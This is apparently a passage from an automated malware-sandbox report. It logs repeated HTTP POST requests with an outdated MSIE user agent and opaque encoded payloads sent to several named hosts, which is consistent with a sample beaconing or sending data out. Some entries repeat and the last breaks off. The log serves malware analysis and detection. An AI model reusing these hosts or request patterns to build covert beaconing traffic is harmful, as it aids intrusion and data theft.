              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 30 49 31 73 59 78 32 39 79 63 61 6c 30 77 61 61 56 42 76 63 4c 56 5a 76 7a 50 76 4c 51 75 41 6d 6f 54 2b 58 74 44 65 59 4c 77 65 70 62 73 4f 59 7a 6b 6a 38 2b 62 31 58 36 7a 75 38 75 78 51 67 70 63 6b 72 49 31 2f 63 55 49 76 59 66 41 42 6c 73 75 57 77 75 36 36 30 49 30 63 39 4c 2b 41 6f 6b 4e 75 61 2f 70 77 50 49 39 2f 79 76 62 74 4f 4c 6d 4a 6a 41 45 68 4d 6c 5a 47 31 6d 4a 65 71 57 4c 41 48 6e 32 57 37 39 77 78 6a 44 42 4a 51 4c 78 4f 6d 56 71 77 43 4e 38 4b 6b 4c 30 6d 54 75 37 73 2f 67 43 6f 41 31 4d 58 4b 51 47 59 78 75 39 79 64 76 57 75 44 4d 36 49 6c 33 39 6a 6d 42 69 4c 4c 51 2b 52 6d 34 76 46 4c 4e 67 49 43 53 30 34 65 67 48 4c 53 63 4a 4f 42 43 61 2f 2f 47 30 73 33 35 42 66 7a 48 37 31 4d 43 70 58 6a 37 39 49 52 58 59 44 73 67 2f 56 54 63 64 43 37 68 49 41 37 37 58 47 54 56 61 4f 56 69 50 74 61 76 57 30 6d 35 45 4e 38 32 56 4d 65 72 6c 32 6b 74 6a 75 58 46 71 70 57 7a 4d 6a 46 4b 50 47 56 70 56 67 76 70 44 4e 55 62 74 32 4d 33 47 6e 35 43 36 30 48 68 72 67 54 52 79 78 4a 35 72 78 38 31 4c 30 69 75 71 52 31 4b 61 4f 37 45 68 6b 65 6b 58 61 33 56 6e 74 43 48 46 6e 45 72 49 76 66 38 70 45 6c 66 5a 61 4c 2b 6c 30 70 44 73 34 41 6f 52 4d 33 46 41 77 75 46 4e 51 62 75 6d 62 4b 57 57 42 73 57 36 73 44 53 56 45 77 37 6b 73 67 4c 54 42 37 41 45 45 6c 31 5a 32 48 56 67 78 6b 39 63 31 56 47 4b 51 53 36 65 74 33 6a 71 79 53 47 75 68 70 65 2f 69 69 6b 38 7a 6b 68 67 30 35 74 55 52 70 5a 57 44 30 48 49 51 43 55 46 50 5a 54 32 61 68 4e 75 4b 30 42 6a 42 75 71 65 47 44 67 32 69 71 59 55 41 6e 70 45 43 41 33 52 59 4d 67 51 68 50 55 2f 76 4b 51 37 58 32 4c 4a 65 38 31 52 44 47 54 58 62 54 53 69 6e 56 51 66 41 68 2f 44 51 58 63 57 42 71 30 31 6e 4d 4e 6d 2b 72 4d 65 70 36 74 79 44 54 6a 66 45 56 71 34 4b 4f 33 66 6b 35 6e 45 43 45 57 2b 73 65 70 36 59 3d Data Ascii: 0I1sYx29ycal0waaVBvcLVZvzPvLQuAmoT+XtDeYLwepbsOYzkj8+b1X6zu8uxQgpckrI1/cUIvYfABlsuWwu660I0c9L+AokNua/pwPI9/yvbtOLmJjAEhMlZG1mJeqWLAHn2W79wxjDBJQLxOmVqwCN8KkL0mTu7s/gCoA1MXKQGYxu9ydvWuDM6Il39jmBiLLQ+Rm4vFLNgICS04egHLScJOBCa//G0s35BfzH71MCpXj79IRXYDsg/VTcdC7hIA77XGTVaOViPtavW0m5EN82VMerl2ktjuXFqpWzMjFKPGVpVgvpDNUbt2M3Gn5C60HhrgTRyxJ5rx81L0iuqR1KaO7EhkekXa3VntCHFnErIvf8pElfZaL+l0pDs4AoRM3FAwuFNQbumbKWWBsW6sDSVEw7ksgLTB7AEEl1Z2HVgxk9c1VGKQS6et3jqySGuhpe/iik8zkhg05tURpZWD0HIQCUFPZT2ahNuK0BjBuqeGDg2iqYUAnpECA3RYMgQhPU/vKQ7X2LJe81RDGTXbTSinVQfAh/DQXcWBq01nMNm+rMep6tyDTjfEVq4KO3fk5nECEW+sep6Y=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 38 30 6a 62 4b 7a 6a 76 78 38 61 4f 4f 5a 66 77 75 32 6c 65 57 69 73 33 68 62 65 41 43 6e 76 53 37 50 32 4c 74 4d 4c 2f 44 71 46 42 43 5a 78 59 64 6a 67 4c 46 43 37 4a 35 57 4c 42 78 67 6f 4f 54 57 2b 46 75 58 56 6e 4b 53 6a 53 70 67 30 5a 79 37 57 52 76 55 33 35 58 52 52 6c 6e 46 4b 61 61 43 69 68 70 6e 6b 56 47 48 35 78 38 6d 79 4e 71 6b 65 6e 6f 2f 67 7a 71 2f 6c 32 6d 68 34 39 45 72 74 78 62 57 64 34 30 59 42 64 56 54 45 55 31 6e 71 6e 42 7a 77 2f 79 32 75 33 74 55 30 41 4e 61 39 44 6b 7a 59 5a 45 6f 7a 66 73 36 73 78 54 55 54 4e 46 64 65 43 76 2f 59 31 79 53 59 48 37 38 4c 51 33 53 45 4a 48 65 4f 52 45 43 78 6e 4f 6b 70 73 65 74 44 76 4f 44 39 70 41 6f 79 54 75 66 75 4f 49 5a 6b 6a 50 49 61 43 2b 4b 57 51 62 47 4e 37 52 32 79 49 77 44 5a 49 58 49 54 4a 41 45 69 75 76 71 57 77 4b 37 37 6e 6e 76 6a 44 68 68 57 33 64 4b 6c 67 36 69 69 68 30 34 50 51 38 53 74 4d 48 55 2b 77 46 74 58 66 44 77 79 61 68 69 6d 30 4e 6a 4a 55 6d 64 66 56 4c 33 4d 4c 70 56 71 48 4f 36 48 41 42 77 78 7a 33 6a 47 6e 46 75 7a 79 73 63 39 4b 4b 59 50 6d 6c 72 66 48 6a 4f 53 74 67 4a 35 35 30 75 62 71 70 35 76 49 76 71 70 45 78 65 61 47 76 50 58 61 49 54 33 54 7a 63 4b 6c 70 68 78 36 46 43 67 41 66 37 6e 68 55 4d 47 54 56 6f 6e 49 64 66 62 33 4a 32 33 6e 58 47 52 64 43 51 68 58 58 78 69 57 4f 42 61 34 72 77 75 43 6a 33 63 77 2f 6d 34 74 65 55 4e 64 4b 34 42 6f 4c 47 58 50 6e 2b 44 2f 77 53 72 45 30 77 4f 63 6a 51 36 39 47 7a 4f 4b 33 44 77 2b 78 6d 79 62 58 68 36 36 69 30 73 69 47 54 71 62 44 78 5a 4a 65 5a 37 4b 41 70 58 35 74 73 4b 75 33 54 68 2b 63 42 78 2b 71 42 51 36 6d 49 65 62 71 68 47 38 73 4e 51 36 59 4e 71 75 7a 6e 6a 33 53 36 50 37 66 70 78 57 6a 4b 2f 2f 6e 54 76 57 34 61 30 41 53 46 53 53 32 34 6c 41 6e 50 69 79 4f 57 4b 6f 78 73 30 46 37 57 6c 30 4c 4f 73 45 55 52 58 52 49 57 51 3d Data Ascii: 80jbKzjvx8aOOZfwu2leWis3hbeACnvS7P2LtML/DqFBCZxYdjgLFC7J5WLBxgoOTW+FuXVnKSjSpg0Zy7WRvU35XRRlnFKaaCihpnkVGH5x8myNqkeno/gzq/l2mh49ErtxbWd40YBdVTEU1nqnBzw/y2u3tU0ANa9DkzYZEozfs6sxTUTNFdeCv/Y1ySYH78LQ3SEJHeORECxnOkpsetDvOD9pAoyTufuOIZkjPIaC+KWQbGN7R2yIwDZIXITJAEiuvqWwK77nnvjDhhW3dKlg6iih04PQ8StMHU+wFtXfDwyahim0NjJUmdfVL3MLpVqHO6HABwxz3jGnFuzysc9KKYPmlrfHjOStgJ550ubqp5vIvqpExeaGvPXaIT3TzcKlphx6FCgAf7nhUMGTVonIdfb3J23nXGRdCQhXXxiWOBa4rwuCj3cw/m4teUNdK4BoLGXPn+D/wSrE0wOcjQ69GzOK3Dw+xmybXh66i0siGTqbDxZJeZ7KApX5tsKu3Th+cBx+qBQ6mIebqhG8sNQ6YNquznj3S6P7fpxWjK//nTvW4a0ASFSS24lAnPiyOWKoxs0F7Wl0LOsEURXRIWQ=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 6a 4a 74 61 45 51 35 6a 7a 38 62 5a 70 33 46 2f 6d 59 2f 4d 6f 6e 47 58 34 66 6f 4f 51 6c 35 7a 49 72 52 77 75 47 4c 70 76 6b 72 7a 43 42 31 78 58 49 32 79 51 44 64 54 52 67 5a 30 66 33 61 71 46 2b 4a 43 2b 51 51 45 32 2b 65 70 59 37 36 50 4f 66 45 6c 73 68 69 54 4b 38 43 32 38 73 6e 65 69 68 6c 71 34 63 4b 61 72 78 70 6d 71 77 56 56 2f 4f 72 6e 62 55 31 7a 69 4a 53 6f 50 72 69 4a 38 4a 2b 39 59 49 36 49 75 50 42 35 53 48 66 57 48 7a 31 58 34 4c 30 74 47 32 73 31 4a 53 74 41 76 2f 4d 4a 4a 65 76 77 32 76 4f 46 58 68 72 76 66 61 76 69 37 79 33 6a 6b 54 31 79 48 76 73 6b 61 5a 4a 6e 7a 70 7a 30 74 6a 75 7a 48 38 73 5a 78 74 6e 4a 6b 2f 55 4c 63 65 64 4c 54 78 66 70 72 36 38 65 71 4c 4c 70 31 63 62 52 5a 42 62 2f 46 41 4d 47 57 58 73 67 75 65 46 6e 35 59 47 61 75 57 53 31 2f 68 52 34 47 6a 61 37 34 38 49 6b 44 35 61 56 45 53 30 4d 68 2b 46 45 59 4f 2b 50 6f 51 67 34 59 2f 4b 76 43 2b 4f 43 55 44 36 61 49 4c 65 57 37 4b 6b 70 31 42 54 6f 32 6d 38 30 59 47 49 78 37 33 45 41 66 36 51 41 35 78 6f 71 6b 58 30 32 66 77 72 61 75 75 4e 51 73 34 6a 51 6b 41 53 72 74 43 6b 52 71 62 78 6b 59 47 61 53 53 64 57 71 63 4f 77 34 72 35 43 70 41 76 48 39 6c 70 31 74 77 41 5a 63 6b 51 65 69 39 6d 30 56 46 68 6e 48 41 52 55 68 44 49 35 61 78 59 33 6e 41 36 4d 67 78 49 41 4b 47 6b 66 55 30 54 62 38 58 2f 30 70 43 74 59 67 45 43 61 2f 6f 79 43 49 57 6d 4d 79 4f 61 7a 4c 66 46 7a 78 78 55 67 58 35 58 2b 62 6d 31 43 63 6b 76 33 33 64 49 57 37 4e 6f 71 6e 78 68 54 41 36 46 41 52 36 33 74 48 35 53 69 62 79 63 77 75 6e 49 76 53 73 67 36 6b 70 58 4b 75 4a 62 51 4c 57 2b 61 6e 37 42 6a 33 57 48 78 5a 38 30 52 6f 35 63 6e 49 58 39 33 50 7a 32 50 52 4a 44 79 77 52 6d 42 69 75 38 35 72 79 56 56 33 45 4a 34 67 34 68 34 45 4a 31 4a 48 36 4b 34 53 51 73 33 54 33 65 39 74 77 58 35 45 41 2f 70 4c 2b 61 7a 78 57 37 67 3d Data Ascii: jJtaEQ5jz8bZp3F/mY/MonGX4foOQl5zIrRwuGLpvkrzCB1xXI2yQDdTRgZ0f3aqF+JC+QQE2+epY76POfElshiTK8C28sneihlq4cKarxpmqwVV/OrnbU1ziJSoPriJ8J+9YI6IuPB5SHfWHz1X4L0tG2s1JStAv/MJJevw2vOFXhrvfavi7y3jkT1yHvskaZJnzpz0tjuzH8sZxtnJk/ULcedLTxfpr68eqLLp1cbRZBb/FAMGWXsgueFn5YGauWS1/hR4Gja748IkD5aVES0Mh+FEYO+PoQg4Y/KvC+OCUD6aILeW7Kkp1BTo2m80YGIx73EAf6QA5xoqkX02fwrauuNQs4jQkASrtCkRqbxkYGaSSdWqcOw4r5CpAvH9lp1twAZckQei9m0VFhnHARUhDI5axY3nA6MgxIAKGkfU0Tb8X/0pCtYgECa/oyCIWmMyOazLfFzxxUgX5X+bm1Cckv33dIW7NoqnxhTA6FAR63tH5SibycwunIvSsg6kpXKuJbQLW+an7Bj3WHxZ80Ro5cnIX93Pz2PRJDywRmBiu85ryVV3EJ4g4h4EJ1JH6K4SQs3T3e9twX5EA/pL+azxW7g=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 44 4a 79 4f 39 6e 36 41 53 63 59 2b 68 42 42 4a 53 61 32 71 49 32 46 47 6b 77 55 2b 78 49 66 66 6b 6d 67 61 64 7a 38 4c 61 36 4f 59 64 68 44 4a 45 2f 68 48 41 57 4c 2f 58 33 4c 57 6f 6d 54 61 75 32 6d 47 61 73 6e 6a 31 65 79 49 4d 7a 53 56 34 6d 47 41 43 6f 4f 43 73 52 31 2f 4a 66 73 6a 65 41 45 41 59 77 32 49 63 6c 49 77 6e 78 55 34 58 5a 49 42 55 53 4f 78 75 4a 38 51 32 66 36 62 55 34 39 4a 38 63 68 6a 35 41 75 59 71 78 41 58 52 55 55 76 52 6f 50 4b 30 64 42 2f 56 70 61 61 30 4b 47 57 65 2f 75 38 73 50 54 78 51 33 44 6b 67 78 41 44 4b 57 62 52 50 7a 67 50 61 71 6b 63 6d 39 4f 34 49 6c 56 4e 4e 50 31 33 39 69 59 63 63 37 56 64 45 66 37 77 74 2b 4d 79 36 6e 44 32 56 58 78 61 34 46 47 56 6f 35 64 42 77 6a 73 54 63 6a 62 56 74 4c 65 6b 62 53 72 4c 41 30 69 51 6f 71 68 46 52 63 36 47 41 7a 71 79 37 35 6d 79 72 39 53 35 70 65 45 35 48 6d 5a 55 74 6e 64 31 45 65 79 56 54 61 32 54 41 44 58 2f 54 38 5a 39 6c 54 4c 4a 7a 67 75 37 39 6b 69 31 44 6d 66 68 75 4a 32 35 63 33 7a 48 69 47 38 39 4e 59 58 56 76 70 4a 76 6a 6e 30 4b 5a 76 41 4e 47 68 7a 4e 62 76 63 51 6f 66 69 6c 75 6f 69 2f 56 75 52 72 76 79 6d 46 2b 69 66 42 38 49 58 73 2f 45 68 63 6f 30 39 6f 50 6d 77 47 66 6b 72 58 56 76 4c 77 73 46 58 37 39 69 79 48 4c 71 42 59 48 5a 44 52 4f 37 43 78 54 4b 4b 41 74 63 2b 54 37 39 59 41 43 77 7a 65 2b 69 71 69 66 56 41 71 67 64 79 49 65 68 38 65 6b 69 79 4d 35 58 4c 45 70 32 2b 50 42 41 79 59 69 6c 33 46 4c 70 66 6b 54 77 58 78 6f 4d 71 59 38 5a 43 38 39 58 54 31 61 78 67 73 53 77 45 57 6c 31 55 4d 53 34 77 69 34 64 71 4f 6e 37 51 61 54 69 54 6e 52 4c 78 4a 4a 44 54 34 35 62 39 72 54 68 45 71 31 51 74 2f 41 30 48 48 39 55 6f 51 5a 6e 39 6f 75 79 6c 69 2f 33 75 50 78 42 38 3d Data Ascii: DJyO9n6AScY+hBBJSa2qI2FGkwU+xIffkmgadz8La6OYdhDJE/hHAWL/X3LWomTau2mGasnj1eyIMzSV4mGACoOCsR1/JfsjeAEAYw2IclIwnxU4XZIBUSOxuJ8Q2f6bU49J8chj5AuYqxAXRUUvRoPK0dB/Vpaa0KGWe/u8sPTxQ3DkgxADKWbRPzgPaqkcm9O4IlVNNP139iYcc7VdEf7wt+My6nD2VXxa4FGVo5dBwjsTcjbVtLekbSrLA0iQoqhFRc6GAzqy75myr9S5peE5HmZUtnd1EeyVTa2TADX/T8Z9lTLJzgu79ki1DmfhuJ25c3zHiG89NYXVvpJvjn0KZvANGhzNbvcQofiluoi/VuRrvymF+ifB8IXs/Ehco09oPmwGfkrXVvLwsFX79iyHLqBYHZDRO7CxTKKAtc+T79YACwze+iqifVAqgdyIeh8ekiyM5XLEp2+PBAyYil3FLpfkTwXxoMqY8ZC89XT1axgsSwEWl1UMS4wi4dqOn7QaTiTnRLxJJDT45b9rThEq1Qt/A0HH9UoQZn9ouyli/3uPxB8=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 38 30 6a 62 4b 7a 6a 76 78 38 61 4f 4f 5a 66 77 75 32 6c 65 57 69 73 33 68 62 65 41 43 6e 76 53 37 50 32 4c 74 4d 4c 2f 44 71 46 42 43 5a 78 59 64 6a 67 4c 46 43 37 4a 35 57 4c 42 78 67 6f 4f 54 57 2b 46 75 58 56 6e 4b 53 6a 53 70 67 30 5a 79 37 57 52 76 55 33 35 58 52 52 6c 6e 46 4b 61 61 43 69 68 70 6e 6b 56 47 48 35 78 38 6d 79 4e 71 6b 65 6e 6f 2f 67 7a 71 2f 6c 32 6d 68 34 39 45 72 74 78 62 57 64 34 30 59 42 64 56 54 45 55 31 6e 71 6e 42 7a 77 2f 79 32 75 33 74 55 30 41 4e 61 39 44 6b 7a 59 5a 45 6f 7a 66 73 36 73 78 54 55 54 4e 46 64 65 43 76 2f 59 31 79 53 59 48 37 38 4c 51 33 53 45 4a 48 65 4f 52 45 43 78 6e 4f 6b 70 73 65 74 44 76 4f 44 39 70 41 6f 79 54 75 66 75 4f 49 5a 6b 6a 50 49 61 43 2b 4b 57 51 62 47 4e 37 52 32 79 49 77 44 5a 49 58 49 54 4a 41 45 69 75 76 71 57 77 4b 37 37 6e 6e 76 6a 44 68 68 57 33 64 4b 6c 67 36 69 69 68 30 34 50 51 38 53 74 4d 48 55 2b 77 46 74 58 66 44 77 79 61 68 69 6d 30 4e 6a 4a 55 6d 64 66 56 4c 33 4d 4c 70 56 71 48 4f 36 48 41 42 77 78 7a 33 6a 47 6e 46 75 7a 79 73 63 39 4b 4b 59 50 6d 6c 72 66 48 6a 4f 53 74 67 4a 35 35 30 75 62 71 70 35 76 49 76 71 70 45 78 65 61 47 76 50 58 61 49 54 33 54 7a 63 4b 6c 70 68 78 36 46 43 67 41 66 37 6e 68 55 4d 47 54 56 6f 6e 49 64 66 62 33 4a 32 33 6e 58 47 52 64 43 51 68 58 58 78 69 57 4f 42 61 34 72 77 75 43 6a 33 63 77 2f 6d 34 74 65 55 4e 64 4b 34 42 6f 4c 47 58 50 6e 2b 44 2f 77 53 72 45 30 77 4f 63 6a 51 36 39 47 7a 4f 4b 33 44 77 2b 78 6d 79 62 58 68 36 36 69 30 73 69 47 54 71 62 44 78 5a 4a 65 5a 37 4b 41 70 58 35 74 73 4b 75 33 54 68 2b 63 42 78 2b 71 42 51 36 6d 49 65 62 71 68 47 38 73 4e 51 36 59 4e 71 75 7a 6e 6a 33 53 36 50 37 66 70 78 57 6a 4b 2f 2f 6e 54 76 57 34 61 30 41 53 46 53 53 32 34 6c 41 6e 50 69 79 4f 57 4b 6f 78 73 30 46 37 57 6c 30 4c 4f 73 45 55 52 58 52 49 57 51 3d Data Ascii: 80jbKzjvx8aOOZfwu2leWis3hbeACnvS7P2LtML/DqFBCZxYdjgLFC7J5WLBxgoOTW+FuXVnKSjSpg0Zy7WRvU35XRRlnFKaaCihpnkVGH5x8myNqkeno/gzq/l2mh49ErtxbWd40YBdVTEU1nqnBzw/y2u3tU0ANa9DkzYZEozfs6sxTUTNFdeCv/Y1ySYH78LQ3SEJHeORECxnOkpsetDvOD9pAoyTufuOIZkjPIaC+KWQbGN7R2yIwDZIXITJAEiuvqWwK77nnvjDhhW3dKlg6iih04PQ8StMHU+wFtXfDwyahim0NjJUmdfVL3MLpVqHO6HABwxz3jGnFuzysc9KKYPmlrfHjOStgJ550ubqp5vIvqpExeaGvPXaIT3TzcKlphx6FCgAf7nhUMGTVonIdfb3J23nXGRdCQhXXxiWOBa4rwuCj3cw/m4teUNdK4BoLGXPn+D/wSrE0wOcjQ69GzOK3Dw+xmybXh66i0siGTqbDxZJeZ7KApX5tsKu3Th+cBx+qBQ6mIebqhG8sNQ6YNquznj3S6P7fpxWjK//nTvW4a0ASFSS24lAnPiyOWKoxs0F7Wl0LOsEURXRIWQ=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 6a 4a 74 61 45 51 35 6a 7a 38 62 5a 70 33 46 2f 6d 59 2f 4d 6f 6e 47 58 34 66 6f 4f 51 6c 35 7a 49 72 52 77 75 47 4c 70 76 6b 72 7a 43 42 31 78 58 49 32 79 51 44 64 54 52 67 5a 30 66 33 61 71 46 2b 4a 43 2b 51 51 45 32 2b 65 70 59 37 36 50 4f 66 45 6c 73 68 69 54 4b 38 43 32 38 73 6e 65 69 68 6c 71 34 63 4b 61 72 78 70 6d 71 77 56 56 2f 4f 72 6e 62 55 31 7a 69 4a 53 6f 50 72 69 4a 38 4a 2b 39 59 49 36 49 75 50 42 35 53 48 66 57 48 7a 31 58 34 4c 30 74 47 32 73 31 4a 53 74 41 76 2f 4d 4a 4a 65 76 77 32 76 4f 46 58 68 72 76 66 61 76 69 37 79 33 6a 6b 54 31 79 48 76 73 6b 61 5a 4a 6e 7a 70 7a 30 74 6a 75 7a 48 38 73 5a 78 74 6e 4a 6b 2f 55 4c 63 65 64 4c 54 78 66 70 72 36 38 65 71 4c 4c 70 31 63 62 52 5a 42 62 2f 46 41 4d 47 57 58 73 67 75 65 46 6e 35 59 47 61 75 57 53 31 2f 68 52 34 47 6a 61 37 34 38 49 6b 44 35 61 56 45 53 30 4d 68 2b 46 45 59 4f 2b 50 6f 51 67 34 59 2f 4b 76 43 2b 4f 43 55 44 36 61 49 4c 65 57 37 4b 6b 70 31 42 54 6f 32 6d 38 30 59 47 49 78 37 33 45 41 66 36 51 41 35 78 6f 71 6b 58 30 32 66 77 72 61 75 75 4e 51 73 34 6a 51 6b 41 53 72 74 43 6b 52 71 62 78 6b 59 47 61 53 53 64 57 71 63 4f 77 34 72 35 43 70 41 76 48 39 6c 70 31 74 77 41 5a 63 6b 51 65 69 39 6d 30 56 46 68 6e 48 41 52 55 68 44 49 35 61 78 59 33 6e 41 36 4d 67 78 49 41 4b 47 6b 66 55 30 54 62 38 58 2f 30 70 43 74 59 67 45 43 61 2f 6f 79 43 49 57 6d 4d 79 4f 61 7a 4c 66 46 7a 78 78 55 67 58 35 58 2b 62 6d 31 43 63 6b 76 33 33 64 49 57 37 4e 6f 71 6e 78 68 54 41 36 46 41 52 36 33 74 48 35 53 69 62 79 63 77 75 6e 49 76 53 73 67 36 6b 70 58 4b 75 4a 62 51 4c 57 2b 61 6e 37 42 6a 33 57 48 78 5a 38 30 52 6f 35 63 6e 49 58 39 33 50 7a 32 50 52 4a 44 79 77 52 6d 42 69 75 38 35 72 79 56 56 33 45 4a 34 67 34 68 34 45 4a 31 4a 48 36 4b 34 53 51 73 33 54 33 65 39 74 77 58 35 45 41 2f 70 4c 2b 61 7a 78 57 37 67 3d Data Ascii: jJtaEQ5jz8bZp3F/mY/MonGX4foOQl5zIrRwuGLpvkrzCB1xXI2yQDdTRgZ0f3aqF+JC+QQE2+epY76POfElshiTK8C28sneihlq4cKarxpmqwVV/OrnbU1ziJSoPriJ8J+9YI6IuPB5SHfWHz1X4L0tG2s1JStAv/MJJevw2vOFXhrvfavi7y3jkT1yHvskaZJnzpz0tjuzH8sZxtnJk/ULcedLTxfpr68eqLLp1cbRZBb/FAMGWXsgueFn5YGauWS1/hR4Gja748IkD5aVES0Mh+FEYO+PoQg4Y/KvC+OCUD6aILeW7Kkp1BTo2m80YGIx73EAf6QA5xoqkX02fwrauuNQs4jQkASrtCkRqbxkYGaSSdWqcOw4r5CpAvH9lp1twAZckQei9m0VFhnHARUhDI5axY3nA6MgxIAKGkfU0Tb8X/0pCtYgECa/oyCIWmMyOazLfFzxxUgX5X+bm1Cckv33dIW7NoqnxhTA6FAR63tH5SibycwunIvSsg6kpXKuJbQLW+an7Bj3WHxZ80Ro5cnIX93Pz2PRJDywRmBiu85ryVV3EJ4g4h4EJ1JH6K4SQs3T3e9twX5EA/pL+azxW7g=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 30 49 31 73 59 78 32 39 79 63 61 6c 30 77 61 61 56 42 76 63 4c 56 5a 76 7a 50 76 4c 51 75 41 6d 6f 54 2b 58 74 44 65 59 4c 77 65 70 62 73 4f 59 7a 6b 6a 38 2b 62 31 58 36 7a 75 38 75 78 51 67 70 63 6b 72 49 31 2f 63 55 49 76 59 66 41 42 6c 73 75 57 77 75 36 36 30 49 30 63 39 4c 2b 41 6f 6b 4e 75 61 2f 70 77 50 49 39 2f 79 76 62 74 4f 4c 6d 4a 6a 41 45 68 4d 6c 5a 47 31 6d 4a 65 71 57 4c 41 48 6e 32 57 37 39 77 78 6a 44 42 4a 51 4c 78 4f 6d 56 71 77 43 4e 38 4b 6b 4c 30 6d 54 75 37 73 2f 67 43 6f 41 31 4d 58 4b 51 47 59 78 75 39 79 64 76 57 75 44 4d 36 49 6c 33 39 6a 6d 42 69 4c 4c 51 2b 52 6d 34 76 46 4c 4e 67 49 43 53 30 34 65 67 48 4c 53 63 4a 4f 42 43 61 2f 2f 47 30 73 33 35 42 66 7a 48 37 31 4d 43 70 58 6a 37 39 49 52 58 59 44 73 67 2f 56 54 63 64 43 37 68 49 41 37 37 58 47 54 56 61 4f 56 69 50 74 61 76 57 30 6d 35 45 4e 38 32 56 4d 65 72 6c 32 6b 74 6a 75 58 46 71 70 57 7a 4d 6a 46 4b 50 47 56 70 56 67 76 70 44 4e 55 62 74 32 4d 33 47 6e 35 43 36 30 48 68 72 67 54 52 79 78 4a 35 72 78 38 31 4c 30 69 75 71 52 31 4b 61 4f 37 45 68 6b 65 6b 58 61 33 56 6e 74 43 48 46 6e 45 72 49 76 66 38 70 45 6c 66 5a 61 4c 2b 6c 30 70 44 73 34 41 6f 52 4d 33 46 41 77 75 46 4e 51 62 75 6d 62 4b 57 57 42 73 57 36 73 44 53 56 45 77 37 6b 73 67 4c 54 42 37 41 45 45 6c 31 5a 32 48 56 67 78 6b 39 63 31 56 47 4b 51 53 36 65 74 33 6a 71 79 53 47 75 68 70 65 2f 69 69 6b 38 7a 6b 68 67 30 35 74 55 52 70 5a 57 44 30 48 49 51 43 55 46 50 5a 54 32 61 68 4e 75 4b 30 42 6a 42 75 71 65 47 44 67 32 69 71 59 55 41 6e 70 45 43 41 33 52 59 4d 67 51 68 50 55 2f 76 4b 51 37 58 32 4c 4a 65 38 31 52 44 47 54 58 62 54 53 69 6e 56 51 66 41 68 2f 44 51 58 63 57 42 71 30 31 6e 4d 4e 6d 2b 72 4d 65 70 36 74 79 44 54 6a 66 45 56 71 34 4b 4f 33 66 6b 35 6e 45 43 45 57 2b 73 65 70 36 59 3d Data Ascii: 0I1sYx29ycal0waaVBvcLVZvzPvLQuAmoT+XtDeYLwepbsOYzkj8+b1X6zu8uxQgpckrI1/cUIvYfABlsuWwu660I0c9L+AokNua/pwPI9/yvbtOLmJjAEhMlZG1mJeqWLAHn2W79wxjDBJQLxOmVqwCN8KkL0mTu7s/gCoA1MXKQGYxu9ydvWuDM6Il39jmBiLLQ+Rm4vFLNgICS04egHLScJOBCa//G0s35BfzH71MCpXj79IRXYDsg/VTcdC7hIA77XGTVaOViPtavW0m5EN82VMerl2ktjuXFqpWzMjFKPGVpVgvpDNUbt2M3Gn5C60HhrgTRyxJ5rx81L0iuqR1KaO7EhkekXa3VntCHFnErIvf8pElfZaL+l0pDs4AoRM3FAwuFNQbumbKWWBsW6sDSVEw7ksgLTB7AEEl1Z2HVgxk9c1VGKQS6et3jqySGuhpe/iik8zkhg05tURpZWD0HIQCUFPZT2ahNuK0BjBuqeGDg2iqYUAnpECA3RYMgQhPU/vKQ7X2LJe81RDGTXbTSinVQfAh/DQXcWBq01nMNm+rMep6tyDTjfEVq4KO3fk5nECEW+sep6Y=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 61 62 6a 64 6c 6b 41 4a 33 4d 5a 68 53 30 56 77 45 2b 75 4b 36 48 4e 47 35 57 63 6f 73 58 71 4c 64 50 51 7a 65 52 32 59 69 74 52 2b 35 30 39 63 31 6e 50 66 7a 53 41 59 56 56 72 4b 34 6a 53 67 79 65 34 63 73 6c 70 65 45 6e 59 6b 64 77 74 4e 61 2b 76 69 71 75 56 4a 6f 38 66 72 37 31 4d 58 30 74 75 38 70 78 58 43 72 63 50 74 4a 66 65 77 31 42 58 70 55 39 65 4f 74 4c 69 73 31 6e 47 7a 37 58 52 45 6b 78 5a 6e 30 64 76 66 47 74 5a 4d 30 45 62 56 51 4c 36 37 6b 44 48 42 4c 70 48 6d 66 52 4d 53 53 33 61 74 57 53 4a 39 6a 6b 58 43 44 62 2f 4b 6d 42 6c 50 74 75 47 75 6b 7a 35 2b 4a 68 32 52 53 4a 68 41 4a 42 47 74 4a 6e 39 4c 54 73 54 73 37 77 55 37 4b 5a 42 71 73 31 6d 7a 57 4c 79 79 35 73 51 36 4e 68 32 55 5a 66 76 64 49 32 72 59 5a 55 42 6c 6e 4a 34 44 57 5a 55 74 2f 30 75 45 79 31 42 4a 39 69 56 5a 72 78 64 32 69 31 46 30 